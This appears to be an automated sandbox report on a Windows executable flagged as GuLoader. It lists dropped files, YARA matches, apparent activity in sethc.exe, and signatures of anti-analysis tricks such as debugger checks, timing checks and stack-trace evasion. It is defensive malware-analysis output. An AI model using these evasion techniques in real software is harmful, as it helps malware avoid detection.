            Source: C:\Users\user\Desktop\rpedido-00035.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.iniJump to behavior
            Source: rpedido-00035.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rpedido-00035.exe, rpedido-00035.exe, 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44785542514.0000000035E38000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782208695.0000000035C8C000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, sethc.exe

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000002.00000002.44867701457.0000000002159000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.44560230071.0000000003D19000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.44867701457.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.44559719436.0000000002908000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.44560230071.0000000003220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Meningorrhoea.Tig, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nszDD94.tmp, type: DROPPED
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_044C08CD push ecx; mov dword ptr [esp], ecx4_2_044C08D6
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043D5485 push ebx; retf 4_2_043D54B6
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043D3DF4 push es; ret 4_2_043D3DFE
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043D5F61 pushfd ; iretd 4_2_043D5F62
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DF7B3 push 00000006h; iretd 4_2_043DF7B5
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DD1DF push 0000000Eh; iretd 4_2_043DD1E6
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043E5272 push eax; ret 4_2_043E5274
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043D0A66 push esp; iretd 4_2_043D0A6E
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043DBB38 push edx; ret 4_2_043DBB49
            Source: C:\Windows\SysWOW64\sethc.exeCode function: 4_2_043D5BFD push ss; retf 4_2_043D5C05
            Source: C:\Users\user\Desktop\rpedido-00035.exeFile created: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rpedido-00035.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI/Special instruction interceptor: Address: 4608F3A
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI/Special instruction interceptor: Address: 2A48F3A
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI/Special instruction interceptor: Address: 7FFB05810594
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI/Special instruction interceptor: Address: 7FFB0580FF74
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI/Special instruction interceptor: Address: 7FFB0580D6C4
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI/Special instruction interceptor: Address: 7FFB0580D864
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580D144
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB05810594
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580D764
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580D324
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580D364
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580D004
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580FF74
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580D6C4
            Source: C:\Windows\SysWOW64\sethc.exeAPI/Special instruction interceptor: Address: 7FFB0580D864
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 rdtsc 2_2_36051763
            Source: C:\Windows\SysWOW64\sethc.exeWindow / User API: threadDelayed 9852Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI coverage: 0.3 %
            Source: C:\Windows\SysWOW64\sethc.exeAPI coverage: 1.1 %
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996Thread sleep count: 122 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996Thread sleep time: -244000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996Thread sleep count: 9852 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sethc.exe TID: 1996Thread sleep time: -19704000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sethc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
            Source: rpedido-00035.exe, 00000002.00000003.44783272355.0000000005C24000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44881124399.0000000005C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI call chain: ExitProcess graph end nodegraph_0-4671
            Source: C:\Users\user\Desktop\rpedido-00035.exeAPI call chain: ExitProcess graph end nodegraph_0-4513
            Source: C:\Windows\SysWOW64\sethc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sethc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 rdtsc 2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_00401E43 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E43
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h]2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h]2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h]2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h]2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h]2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360A3608 mov eax, dword ptr fs:[00000030h]2_2_360A3608
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603D600 mov eax, dword ptr fs:[00000030h]2_2_3603D600
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603D600 mov eax, dword ptr fs:[00000030h]2_2_3603D600
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CF607 mov eax, dword ptr fs:[00000030h]2_2_360CF607
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604360F mov eax, dword ptr fs:[00000030h]2_2_3604360F
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E4600 mov eax, dword ptr fs:[00000030h]2_2_360E4600
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36017623 mov eax, dword ptr fs:[00000030h]2_2_36017623
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36015622 mov eax, dword ptr fs:[00000030h]2_2_36015622
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36015622 mov eax, dword ptr fs:[00000030h]2_2_36015622
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604C620 mov eax, dword ptr fs:[00000030h]2_2_3604C620
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BD62C mov ecx, dword ptr fs:[00000030h]2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BD62C mov ecx, dword ptr fs:[00000030h]2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BD62C mov eax, dword ptr fs:[00000030h]2_2_360BD62C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36010630 mov eax, dword ptr fs:[00000030h]2_2_36010630
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36040630 mov eax, dword ptr fs:[00000030h]2_2_36040630
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36098633 mov esi, dword ptr fs:[00000030h]2_2_36098633
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36098633 mov eax, dword ptr fs:[00000030h]2_2_36098633
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36098633 mov eax, dword ptr fs:[00000030h]2_2_36098633
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604F63F mov eax, dword ptr fs:[00000030h]2_2_3604F63F
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604F63F mov eax, dword ptr fs:[00000030h]2_2_3604F63F
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36013640 mov eax, dword ptr fs:[00000030h]2_2_36013640
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F640 mov eax, dword ptr fs:[00000030h]2_2_3602F640
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F640 mov eax, dword ptr fs:[00000030h]2_2_3602F640
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F640 mov eax, dword ptr fs:[00000030h]2_2_3602F640
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604C640 mov eax, dword ptr fs:[00000030h]2_2_3604C640
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604C640 mov eax, dword ptr fs:[00000030h]2_2_3604C640
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600D64A mov eax, dword ptr fs:[00000030h]2_2_3600D64A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600D64A mov eax, dword ptr fs:[00000030h]2_2_3600D64A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36045654 mov eax, dword ptr fs:[00000030h]2_2_36045654
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604265C mov eax, dword ptr fs:[00000030h]2_2_3604265C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604265C mov ecx, dword ptr fs:[00000030h]2_2_3604265C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604265C mov eax, dword ptr fs:[00000030h]2_2_3604265C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601965A mov eax, dword ptr fs:[00000030h]2_2_3601965A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601965A mov eax, dword ptr fs:[00000030h]2_2_3601965A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36023660 mov eax, dword ptr fs:[00000030h]2_2_36023660
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36023660 mov eax, dword ptr fs:[00000030h]2_2_36023660
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36023660 mov eax, dword ptr fs:[00000030h]2_2_36023660
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36007662 mov eax, dword ptr fs:[00000030h]2_2_36007662
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36007662 mov eax, dword ptr fs:[00000030h]2_2_36007662
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36007662 mov eax, dword ptr fs:[00000030h]2_2_36007662
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604666D mov esi, dword ptr fs:[00000030h]2_2_3604666D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604666D mov eax, dword ptr fs:[00000030h]2_2_3604666D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604666D mov eax, dword ptr fs:[00000030h]2_2_3604666D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36010670 mov eax, dword ptr fs:[00000030h]2_2_36010670
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052670 mov eax, dword ptr fs:[00000030h]2_2_36052670
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36052670 mov eax, dword ptr fs:[00000030h]2_2_36052670
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CF68C mov eax, dword ptr fs:[00000030h]2_2_360CF68C
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36020680 mov eax, dword ptr fs:[00000030h]2_2_36020680
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36018690 mov eax, dword ptr fs:[00000030h]2_2_36018690
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3609C691 mov eax, dword ptr fs:[00000030h]2_2_3609C691
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D86A8 mov eax, dword ptr fs:[00000030h]2_2_360D86A8
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D86A8 mov eax, dword ptr fs:[00000030h]2_2_360D86A8
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360B86C2 mov eax, dword ptr fs:[00000030h]2_2_360B86C2
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DA6C0 mov eax, dword ptr fs:[00000030h]2_2_360DA6C0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360106CF mov eax, dword ptr fs:[00000030h]2_2_360106CF
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603D6D0 mov eax, dword ptr fs:[00000030h]2_2_3603D6D0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360096E0 mov eax, dword ptr fs:[00000030h]2_2_360096E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360096E0 mov eax, dword ptr fs:[00000030h]2_2_360096E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601C6E0 mov eax, dword ptr fs:[00000030h]2_2_3601C6E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360156E0 mov eax, dword ptr fs:[00000030h]2_2_360156E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360156E0 mov eax, dword ptr fs:[00000030h]2_2_360156E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360156E0 mov eax, dword ptr fs:[00000030h]2_2_360156E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360366E0 mov eax, dword ptr fs:[00000030h]2_2_360366E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360366E0 mov eax, dword ptr fs:[00000030h]2_2_360366E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608C6F2 mov eax, dword ptr fs:[00000030h]2_2_3608C6F2
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608C6F2 mov eax, dword ptr fs:[00000030h]2_2_3608C6F2
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601D700 mov ecx, dword ptr fs:[00000030h]2_2_3601D700
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h]2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h]2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h]2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600B705 mov eax, dword ptr fs:[00000030h]2_2_3600B705
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D970B mov eax, dword ptr fs:[00000030h]2_2_360D970B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360D970B mov eax, dword ptr fs:[00000030h]2_2_360D970B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603270D mov eax, dword ptr fs:[00000030h]2_2_3603270D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603270D mov eax, dword ptr fs:[00000030h]2_2_3603270D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603270D mov eax, dword ptr fs:[00000030h]2_2_3603270D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601471B mov eax, dword ptr fs:[00000030h]2_2_3601471B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601471B mov eax, dword ptr fs:[00000030h]2_2_3601471B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CF717 mov eax, dword ptr fs:[00000030h]2_2_360CF717
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36039723 mov eax, dword ptr fs:[00000030h]2_2_36039723
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36043740 mov eax, dword ptr fs:[00000030h]2_2_36043740
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604174A mov eax, dword ptr fs:[00000030h]2_2_3604174A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604A750 mov eax, dword ptr fs:[00000030h]2_2_3604A750
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36032755 mov eax, dword ptr fs:[00000030h]2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36032755 mov eax, dword ptr fs:[00000030h]2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36032755 mov eax, dword ptr fs:[00000030h]2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36032755 mov ecx, dword ptr fs:[00000030h]2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36032755 mov eax, dword ptr fs:[00000030h]2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36032755 mov eax, dword ptr fs:[00000030h]2_2_36032755
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3600F75B mov eax, dword ptr fs:[00000030h]2_2_3600F75B
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360BE750 mov eax, dword ptr fs:[00000030h]2_2_360BE750
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36022760 mov ecx, dword ptr fs:[00000030h]2_2_36022760
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 mov eax, dword ptr fs:[00000030h]2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 mov eax, dword ptr fs:[00000030h]2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 mov eax, dword ptr fs:[00000030h]2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 mov eax, dword ptr fs:[00000030h]2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 mov eax, dword ptr fs:[00000030h]2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36051763 mov eax, dword ptr fs:[00000030h]2_2_36051763
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36040774 mov eax, dword ptr fs:[00000030h]2_2_36040774
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36014779 mov eax, dword ptr fs:[00000030h]2_2_36014779
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36014779 mov eax, dword ptr fs:[00000030h]2_2_36014779
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360EB781 mov eax, dword ptr fs:[00000030h]2_2_360EB781
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360EB781 mov eax, dword ptr fs:[00000030h]2_2_360EB781
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36041796 mov eax, dword ptr fs:[00000030h]2_2_36041796
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36041796 mov eax, dword ptr fs:[00000030h]2_2_36041796
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E79D mov eax, dword ptr fs:[00000030h]2_2_3608E79D
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360107A7 mov eax, dword ptr fs:[00000030h]2_2_360107A7
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DD7A7 mov eax, dword ptr fs:[00000030h]2_2_360DD7A7
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DD7A7 mov eax, dword ptr fs:[00000030h]2_2_360DD7A7
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360DD7A7 mov eax, dword ptr fs:[00000030h]2_2_360DD7A7
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360E17BC mov eax, dword ptr fs:[00000030h]2_2_360E17BC
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360CF7CF mov eax, dword ptr fs:[00000030h]2_2_360CF7CF
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603E7E0 mov eax, dword ptr fs:[00000030h]2_2_3603E7E0
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h]2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h]2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h]2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h]2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h]2_2_360137E4
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_360137E4 mov eax, dword ptr fs:[00000030h]2_2_360137E4
